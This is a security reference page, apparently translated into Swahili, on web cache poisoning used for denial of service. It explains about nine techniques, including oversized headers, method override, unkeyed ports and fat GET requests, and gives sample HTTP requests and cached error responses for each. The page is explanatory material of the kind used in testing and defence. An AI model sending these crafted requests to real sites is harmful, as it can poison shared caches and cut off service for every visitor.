Cache Poisoning to DoS

Reading time: 4 minutes

• HTTP Header Oversize (HHO)

Tuma ombi lenye ukubwa wa kichwa mkubwa kuliko ule unaounga mkono na seva ya wavuti lakini mdogo kuliko ule unaounga mkono na seva ya cache. Seva ya wavuti itajibu kwa jibu la 400 ambalo linaweza kuhifadhiwa:

GET / HTTP/1.1
Host: redacted.com
X-Oversize-Hedear:Big-Value-000000000000000

• HTTP Meta Character (HMC) & Thamani zisizotarajiwa

Tuma kichwa ambacho kina micharacter ya meta yenye madhara kama na . Ili shambulio lifanye kazi lazima upite cache kwanza.

GET / HTTP/1.1
Host: redacted.com
X-Meta-Hedear:Bad Chars\n \r

Header iliyo na usanidi mbaya inaweza kuwa tu \: kama kichwa.

Hii pia inaweza kufanya kazi ikiwa thamani zisizotarajiwa zitatumwa, kama vile Content-Type zisizotarajiwa:

GET /anas/repos HTTP/2
Host: redacted.com
Content-Type: HelloWorld

• Unkeyed header

Baadhi ya tovuti zitarudisha msimbo wa hali ya kosa ikiwa zinaona vichwa fulani maalum katika ombi kama vile na kichwa X-Amz-Website-Location-Redirect: someThing:

GET /app.js HTTP/2
Host: redacted.com
X-Amz-Website-Location-Redirect: someThing

HTTP/2 403 Forbidden
Cache: hit

Invalid Header

• HTTP Method Override Attack (HMO)

Ikiwa seva inasaidia kubadilisha njia ya HTTP kwa kutumia vichwa kama X-HTTP-Method-Override, X-HTTP-Method au X-Method-Override. Inawezekana kuomba ukurasa halali kwa kubadilisha njia ili seva isiupe, hivyo jibu mbaya linapata uhifadhi:

GET /blogs HTTP/1.1
Host: redacted.com
HTTP-Method-Override: POST

• Unkeyed Port

Ikiwa bandari katika kichwa cha Host inarudishwa katika jibu na haijajumuishwa katika ufunguo wa cache, inawezekana kuielekeza kwenye bandari isiyotumika:

GET /index.html HTTP/1.1
Host: redacted.com:1

HTTP/1.1 301 Moved Permanently
Location: https://redacted.com:1/en/index.html
Cache: miss

• Long Redirect DoS

Kama katika mfano ufuatao, x haikuhifadhiwa, hivyo mshambuliaji anaweza kutumia tabia ya majibu ya kuhamasisha ili kufanya kuhamasisha kutuma URL kubwa kiasi kwamba inarudisha kosa. Kisha, watu wanaojaribu kufikia URL bila funguo ya x isiyohifadhiwa watapata jibu la kosa:

GET /login?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com

HTTP/1.1 301 Moved Permanently
Location: /login/?x=veryLongUrl
Cache: hit

GET /login/?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com

HTTP/1.1 414 Request-URI Too Large
CF-Cache-Status: miss

• Kurekebisha kesi ya kichwa cha mwenyeji

Kichwa cha mwenyeji kinapaswa kuwa kisichokuwa na kesi lakini baadhi ya tovuti zinatarajia kuwa katika herufi ndogo na kurudisha kosa ikiwa si hivyo:

GET /img.png HTTP/1.1
Host: Cdn.redacted.com

HTTP/1.1 404 Not Found
Cache:miss

Not Found

• Path normalization

Baadhi ya kurasa zitarudisha nambari za makosa zinapotuma data URLencode katika njia, hata hivyo, seva ya cache itafanya URLdecode njia na kuhifadhi jibu kwa njia iliyofanywa URLdecode:

GET /api/v1%2e1/user HTTP/1.1
Host: redacted.com


HTTP/1.1 404 Not Found
Cach:miss

Not Found

• Fat Get

Baadhi ya seva za cache, kama Cloudflare, au seva za wavuti, zinaacha maombi ya GET yenye mwili, hivyo hii inaweza kutumika vibaya kuhifadhi jibu lisilo sahihi:

GET /index.html HTTP/2
Host: redacted.com
Content-Length: 3

xyz


HTTP/2 403 Forbidden
Cache: hit

Marejeo

• https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52
• https://youst.in/posts/cache-poisoning-at-scale/?source=post_page-----3a829f221f52--------------------------------